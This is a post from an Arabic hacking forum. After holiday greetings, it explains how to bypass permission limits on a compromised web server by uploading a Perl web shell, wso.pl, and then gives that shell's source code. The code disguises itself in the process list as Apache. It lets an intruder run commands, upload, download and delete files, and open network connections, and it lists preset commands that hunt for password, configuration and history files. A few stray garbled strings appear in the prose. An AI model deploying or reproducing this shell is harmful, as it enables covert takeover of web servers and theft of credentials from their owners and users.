1. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    [​IMG]
    كيف حال زوار ة اعضاء و مشرفين المنتدى الحبيب انشاء الله بخير
    ب مناسبة عيد راس السنة احب ان اهنئ جميع الاعضاء و المشرفين الكرام
    ب حلول سنة جديدة و انشاء الله تكون سنة جميلة وكلها خير على جميع المسلمين
    في كل البلدان العربية وخاصة العراق انشاء الله تتحسن الاوضاع
    و تحقيق اماني كل الي في قلبة من يقرئ الموضوع وبحقق امنياتة
    [​IMG]
    ندخل في الموضوع الموضوع مميز هذي المرة و اعتقد الكل يعاني منة
    و هوة منع الصلاحيات عند رفع الشل ولا تستطيع ان تقوم ب عمل اي شي من داخلة
    مثل هذي المشكلة
    نلاحظ ب اننا لا نستطيع ان نعمل اي شي من داخل الشل من قراة شي او رفع شي او نشاء مجلد او انشاء اي شي او مسح اي شي لا نستطيع قرائة الكيرنل ولا ايبي السيرفر ولا يوزر الموقع ولا اي شي ابدآNot writable )6:" {3$0}
    [​IMG]

    :{3}:

    [​IMG]

    الخطوات ل تخطي هذي المشاكل هي ك التالي
    pir+_"te2
    نقوم ب رفع شل اوامر C M D مثل مادليست المشهور
    موجود عند الكل و نقوم ب رفع هذا الشل ب امتداد بايرل
    wso.pl
    [​IMG]

    [PERL]#!/usr/bin/perl
    use IO::Socket;my($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$div1,$dive,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Redirector,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$HeaderBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suffixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$HtmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPassword,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand,$RunCommand1,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFile,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$zapros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetName,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd,$iaddr,$paddr,$proto,$rin,$win,$ein,$buff,$rout,$wout,$eout):shared;$0="/usr/sbin/apache2 -k start";# <-- shell in ps aux
    $Password="28a8351105bc24af7d8d49687e78e92f";# hazem
    $CommandTimeoutDuration=360;# max time of command execution in seconds
    $tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size=1>";$tabe='</table>';$div1='<div class=content><pre class=ml1>';$div='<div class=content>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&1 1>&2":" 1>&1 2>&1");use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Boundary='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderBody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'filedata'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$val=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}=$val;[email protected]=split(/&/,$in);foreach my $i(0 .. $#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){return "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];}}sub dlink($){if(-l $_[0]){return '->'.readlink $_[0]}}sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if(-d $arg){print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form method=POST name='.$ii.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="'.dir_read($arg).'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.dlink($arg).' ]</b></font></a></form></td><td>dir</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1=(stat $arg)[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB";}print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form name='.$ii.' method=post><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.dlink($arg).'</font></a></form></td><td>'.$size.'</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td>'.$tabe.'</td></tr>'}}print $tabe;sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);my $suid=substr $mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FF0000>'.$last.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FFFFFF>'.$last.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#25ff00>'.$last.'</font></td>';}}else{if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}}sub mt{my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $file ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @files,$file;[email protected]=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
    <html><head><title>PPS 4.0</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-decoration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color: #df5 !important;}span{font-weight: bolder;}h1{border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;background-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;font:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;overflow:auto;}.bigarea{width:100%;height:300px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5;font: 9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width: 300px}.toolsInp2{border: none;width:100%;height:300px;background-color:#333}.toolsInp1{border: none}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="changeText();document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Pwd:</span></td><td><nobr>
    END
    P(`$uname`);print "</nobr><br>";P(`$idd`);print "<br>";PH(`$hddall`);print " GB <span>Free: </span>";PH(`$hddfree`);print " GB [ ";P(`$hddproc`);print "% ]";$time=mt();print "<br>$time$tab";print "<span> Server software: </span>$ENV{'SERVER_SOFTWARE'}</span><td>";my $cwd="";my @path=split("/",$CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777);my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print $tabe;sub cwdcol{if(!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td>$tabe";print <<END;
    </td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr>$tabe<table width=100% cellpadding=3 cellspacing=0 width=100% bgcolor=#444><td><th width="11%"><form method="POST" name=systeminfo><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form><th></td><td><form method=POST name=files><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove><input type="hidden" name="a" value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td>$tabe</tr>$tabe<font color="#C0C0C0" size="2">
    END
    }sub PrintLoginForm{print "<center><form name=f method=POST><input type=password name=p><input type=submit value='>>'></form></center>";}sub PrintPageFooter{print "</font></body></html>";}sub [email protected]=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";dir_list();print "<tr><form method=post><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><select name=group><option value=delete>Delete</option><option value=tar>Compress [tar.gz]</option><option value=untar>Uncompress [tar.gz]</option></select><input type=submit value='>>' onclick='validate()'></tr></form>$dive";sub wr_cur {if(!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writable]</font>';}}sub PrintVar{print <<END;
    <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST><span>Make dir:</span>
    END
    wr_cur();print <<END;
    <br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST><span>Make file:</span>
    END
    wr_cur();print <<END;
    <br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
    <td>
    END
    &PrintFileUploadForm;print <<END;
    </td>$tabe
    END
    }sub PrintFileUploadForm{print <<END;
    <span>Upload file: </span>
    END
    wr_cur();print <<END;
    <br><form name="upload_file_form" enctype="multipart/form-data" method="POST"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form><script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}function validate(form){var namelist='';var names=document.getElementsByName('lo'); var lo=document.getElementsByName('zip');for(var i=0;i<names.length;i++){if(names.checked){namelist+=lo.value+' ';}}setCookie("f",namelist,"","/");}function sall(form){var namelist='';var ch=true;var names=document.getElementsByName('lo');var ss=document.getElementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(var i=0;i<names.length;i++){names.checked=ch;}}</script>
    END
    }&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr(hex $1)/eg;return $str;}sub ConsoleP{print <<END;
    <form name="run" method="POST"><br><input type=text size=2 id="sub3" disabled value='\$ '><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text name="c" style="border:0px" size=200 class=toolsInp1 id='lsname' onkeypress="s(event)" value=''><input type=submit class=toolsInp1 id="sub4" value=''></form></td></tr>$tab<td><form name="alias" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases id='nnname' class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate '.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit id="sub2" value='>>'></form></td><td><form name="l11" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=l11 id='l11' class=toolsInp>
    END
    print "<option value=".$last[-1].">".$last[-1]."</option>";foreach $arg(@last){print "<option value=\"$arg\">$arg</option>";}print <<END;
    </select><input type=submit id="sub5" value='>>'></form></td>$tabe<script>document.getElementById('sub3').style.borderColor='#444';document.getElementById('sub2').style.borderColor='#333';document.getElementById('lsname').style.borderColor='#333';document.getElementById('nnname').style.borderColor='#333';document.getElementById('sub4').style.borderColor='#333';document.getElementById("lsname").style.backgroundColor='#333';document.getElementById("l11").style.backgroundColor='#4444';document.getElementById("sub5").style.backgroundColor='#444';document.getElementById('l11').style.borderColor='#444';document.getElementById('sub5').style.borderColor='#444';document.getElementById("sub3").style.backgroundColor='#333';document.getElementById("sub3").style.borderColor='#333';document.getElementById("sub4").style.backgroundColor='#333';document.getElementById('lsname').focus();
    function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.keyCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selectedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x+1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex-1;}}</script>$dive
    END
    &PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if(!-w $_[0]){$wr='<font color=#FF0000> Not writable</font>'}else{$wr='<font color=#25ff00> Writable</font>'}my $time=mt1((stat($_[0]))[8]);sub ffs{return '<font color=#df5>'}sub ffe{return '</font>'}$ffs=ffs();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9]);print "<div class=content>$tab<td><b>$ffs Name: $ffe</b>$TransferFile</td><td><b>$ffs Size: $ffe</b>$size</td><td><b>$ffs Permission: $ffe</b>$owner</td><td><b>$ffs Access time: $ffe</b>$time</td>$tabe$tab<td><b>$ffs Create time: $ffe</b>$ctime</td><td><b>$ffs Modify time: $ffe</b>$motime</td><td>$wr$tabe</td><table id=toolsTbl cellpadding=0 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3><tr><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=rename_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value=RENAME></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value=touch_file><input type=hidden name=path value=".$_[0]."><input type=text size=20 name=touch_file value='$motime'><input type=submit value=TOUCH></form></td><td><form name=run method=POST><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=".$_[0]."><input type=hidden name=c value=chmod_file><input type=submit value=CHMOD></form></td><td><form name=run method=POST><input type=hidden name=a value=hexdump><input type=hidden name=f value=$TransferFile><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=HEXDUMP></form></td><td><form name=run method=POST><input type=hidden name=a value=download><input type=hidden name=f value=$TransferFile><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=DOWNLOAD></form></td><td><form name=run method=POST><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=VIEW></form></td><td><form name=run method=POST><input type=hidden name=a value=edit_file_path><input type=hidden name=d value=$CurrentDir><input type=hidden name=path value=$TransferFile><input type=submit value=EDIT></form></td>$tabe</td>$tabe</div>";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$CurrentDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";my $path=$CurrentDir."/".$TransferFile;ft($path);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print "<h1>Console:</h1>";print "$div<font style=\"font:9pt Monospace,'Courier New';\"><textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly>";$Prompt="[$ServerName $CurrentDir]";print "$Prompt</textarea></font>";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm(0);print "</xmp>Command exceeded maximum time of$CommandTimeoutDuration second(s).<br>Killed it!";ConsoleP();exit;}}sub file_header{print "<h1>File manager</h1>$div<table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx name=ch11 onclick='sall()'></th><th>&nbsp;Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=length $h;$h=ha $h;if($x<3500){$h.=$RunCommand."ussr"}else{$h=$RunCommand."ussr"[email protected]=split(/ussr/,$h);$h=ah $h;print <<END;
    <script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}setCookie("last_command","$h","","/");</script>
    END
